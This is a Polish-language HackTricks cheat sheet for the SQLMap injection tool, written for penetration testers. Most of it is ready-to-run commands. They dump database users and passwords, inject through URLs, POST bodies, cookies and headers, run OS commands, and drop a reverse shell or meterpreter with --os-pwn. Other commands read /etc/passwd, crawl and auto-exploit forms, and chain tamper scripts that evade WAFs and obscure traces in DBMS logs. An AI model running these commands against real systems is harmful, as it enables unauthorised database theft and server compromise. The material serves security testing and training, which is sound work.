SQLMap - CheatSheet

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie dla HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na githubie.

Uzyskaj perspektywę hakera na swoje aplikacje webowe, sieć i chmurę

Znajdź i zgłoś krytyczne, podatne na ataki luki, które mają rzeczywisty wpływ na biznes. Użyj naszych 20+ niestandardowych narzędzi, aby zmapować powierzchnię ataku, znaleźć problemy z bezpieczeństwem, które pozwalają na eskalację uprawnień, oraz użyj zautomatyzowanych exploitów do zbierania niezbędnych dowodów, przekształcając swoją ciężką pracę w przekonujące raporty.

Penetration testing toolkit, ready to usePentest-Tools.com

Podstawowe argumenty dla SQLmap

Ogólne

-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=http://127.0.0.1:8080
--union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char

Pobierz informacje

Wewnętrzne

--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB
--privileges #Get privileges

Dane DB

--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table  ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column

Używając SQLMapping, jest to praktyczne narzędzie, które generuje polecenia i zapewnia pełny przegląd, zarówno podstawowy, jak i zaawansowany, dla SQLMap. Zawiera ToolTips, które wyjaśniają każdy aspekt narzędzia, szczegółowo opisując każdą opcję, abyś mógł poprawić i zrozumieć, jak używać go efektywnie i skutecznie.

Miejsce wstrzyknięcia

Z przechwycenia Burp/ZAP

Przechwyć żądanie i utwórz plik req.txt.

sqlmap -r req.txt --current-user

Wstrzykiwanie Żądania GET

sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id

Wstrzykiwanie Żądania POST

sqlmap -u "http://example.com" --data "username=*&password=*"

Iniekcje w nagłówkach i inne metody HTTP

#Inside cookie
sqlmap  -u "http://example.com" --cookie "mycookies=*"

#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

#The injection is located at the '*'

Wskaźnik ciągu, gdy wstrzyknięcie jest udane

--string="string_showed_when_TRUE"

Eval

Sqlmap umożliwia użycie -e lub --eval, aby przetworzyć każdy ładunek przed jego wysłaniem za pomocą jednego wiersza kodu w Pythonie. Ułatwia to i przyspiesza przetwarzanie ładunku w niestandardowy sposób przed jego wysłaniem. W następującym przykładzie sesja cookie flask jest podpisywana przez flask znanym sekretem przed jej wysłaniem:

sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump

Powłoka

#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami

#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell

#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn

Przeczytaj plik

--file-read=/etc/passwd

Przeszukaj stronę internetową za pomocą SQLmap i automatyczne wykorzystanie

sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms

Drugi Rząd Wstrzyknięcia

python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs

Przeczytaj ten post o tym, jak przeprowadzać proste i złożone drugorzędowe wstrzyknięcia za pomocą sqlmap.

Dostosowywanie wstrzyknięcia

Ustaw sufiks

python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "

Prefiks

python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "

Pomoc w znajdowaniu wstrzyknięć logicznych

# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch

Tamper

Pamiętaj, że możesz stworzyć własny tamper w pythonie i jest to bardzo proste. Możesz znaleźć przykład tampera na stronie Drugiego Rzędu Wstrzyknięcia tutaj.

--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper

Tamper

Opis

apostrophemask.py

Zastępuje znak apostrofu jego pełnowymiarowym odpowiednikiem UTF-8

apostrophenullencode.py

Zastępuje znak apostrofu jego nielegalnym podwójnym odpowiednikiem unicode

appendnullbyte.py

Dodaje zakodowany znak NULL na końcu ładunku

base64encode.py

Koduje wszystkie znaki w danym ładunku w formacie Base64

between.py

Zastępuje operator większy niż ('>') z 'NOT BETWEEN 0 AND #'

bluecoat.py

Zastępuje znak spacji po instrukcji SQL ważnym losowym znakiem pustym. Następnie zastępuje znak = operatorem LIKE

chardoubleencode.py

Podwójnie koduje URL wszystkie znaki w danym ładunku (nie przetwarzając już zakodowanych)

commalesslimit.py

Zastępuje wystąpienia takie jak 'LIMIT M, N' z 'LIMIT N OFFSET M'

commalessmid.py

Zastępuje wystąpienia takie jak 'MID(A, B, C)' z 'MID(A FROM B FOR C)'

concat2concatws.py

Zastępuje wystąpienia takie jak 'CONCAT(A, B)' z 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'

charencode.py

Koduje URL wszystkie znaki w danym ładunku (nie przetwarzając już zakodowanych)

charunicodeencode.py

Koduje znaki unicode w danym ładunku (nie przetwarzając już zakodowanych). "%u0022"

charunicodeescape.py

Koduje znaki unicode w danym ładunku (nie przetwarzając już zakodowanych). "\u0022"

equaltolike.py

Zastępuje wszystkie wystąpienia operatora równości ('=') operatorem 'LIKE'

escapequotes.py

Używa znaku ukośnika do ucieczki dla cudzysłowów (' i ")

greatest.py

Zastępuje operator większy niż ('>') jego odpowiednikiem 'GREATEST'

halfversionedmorekeywords.py

Dodaje wersjonowany komentarz MySQL przed każdym słowem kluczowym

ifnull2ifisnull.py

Zastępuje wystąpienia takie jak 'IFNULL(A, B)' z 'IF(ISNULL(A), B, A)'

modsecurityversioned.py

Otacza pełne zapytanie wersjonowanym komentarzem

modsecurityzeroversioned.py

Otacza pełne zapytanie zerowym wersjonowanym komentarzem

multiplespaces.py

Dodaje wiele spacji wokół słów kluczowych SQL

nonrecursivereplacement.py

Zastępuje zdefiniowane słowa kluczowe SQL reprezentacjami odpowiednimi do zastąpienia (np. .replace("SELECT", "")) filtruje

percentage.py

Dodaje znak procentu ('%') przed każdym znakiem

overlongutf8.py

Konwertuje wszystkie znaki w danym ładunku (nie przetwarzając już zakodowanych)

randomcase.py

Zastępuje każdy znak słowa kluczowego losową wartością wielkości liter

randomcomments.py

Dodaje losowe komentarze do słów kluczowych SQL

securesphere.py

Dodaje specjalnie skonstruowany ciąg

sp_password.py

Dodaje 'sp_password' na końcu ładunku w celu automatycznego zaciemnienia w logach DBMS

space2comment.py

Zastępuje znak spacji (' ') komentarzami

space2dash.py

Zastępuje znak spacji (' ') komentarzem w postaci myślnika ('--') po którym następuje losowy ciąg i nowa linia ('\n')

space2hash.py

Zastępuje znak spacji (' ') znakiem funta ('#') po którym następuje losowy ciąg i nowa linia ('\n')

space2morehash.py

Zastępuje znak spacji (' ') znakiem funta ('#') po którym następuje losowy ciąg i nowa linia ('\n')

space2mssqlblank.py

Zastępuje znak spacji (' ') losowym znakiem pustym z ważnego zestawu alternatywnych znaków

space2mssqlhash.py

Zastępuje znak spacji (' ') znakiem funta ('#') po którym następuje nowa linia ('\n')

space2mysqlblank.py

Zastępuje znak spacji (' ') losowym znakiem pustym z ważnego zestawu alternatywnych znaków

space2mysqldash.py

Zastępuje znak spacji (' ') komentarzem w postaci myślnika ('--') po którym następuje nowa linia ('\n')

space2plus.py

Zastępuje znak spacji (' ') znakiem plusa ('+')

space2randomblank.py

Zastępuje znak spacji (' ') losowym znakiem pustym z ważnego zestawu alternatywnych znaków

symboliclogical.py

Zastępuje operatory logiczne AND i OR ich symbolicznymi odpowiednikami (&& i

unionalltounion.py

Zastępuje UNION ALL SELECT z UNION SELECT

unmagicquotes.py

Zastępuje znak cudzysłowu (') kombinacją wielobajtową %bf%27 razem z ogólnym komentarzem na końcu (aby to działało)

uppercase.py

Zastępuje każdy znak słowa kluczowego wartością wielką 'INSERT'

varnish.py

Dodaje nagłówek HTTP 'X-originating-IP'

versionedkeywords.py

Otacza każde nie-funkcyjne słowo kluczowe wersjonowanym komentarzem MySQL

versionedmorekeywords.py

Otacza każde słowo kluczowe wersjonowanym komentarzem MySQL

xforwardedfor.py

Dodaje fałszywy nagłówek HTTP 'X-Forwarded-For'

Uzyskaj perspektywę hakera na swoje aplikacje internetowe, sieć i chmurę

Znajdź i zgłoś krytyczne, wykorzystywalne luki z rzeczywistym wpływem na biznes. Użyj naszych 20+ niestandardowych narzędzi do mapowania powierzchni ataku, znajdowania problemów z bezpieczeństwem, które pozwalają na eskalację uprawnień, oraz użyj zautomatyzowanych exploitów do zbierania niezbędnych dowodów, przekształcając swoją ciężką pracę w przekonujące raporty.

Penetration testing toolkit, ready to usePentest-Tools.com

Wsparcie dla HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
Podziel się trikami hakerskimi, przesyłając PR do HackTricks i HackTricks Cloud repozytoriów github.

PreviousRCE with PostgreSQL Extensions NextSecond Order Injection - SQLMap

Last updated 4 days ago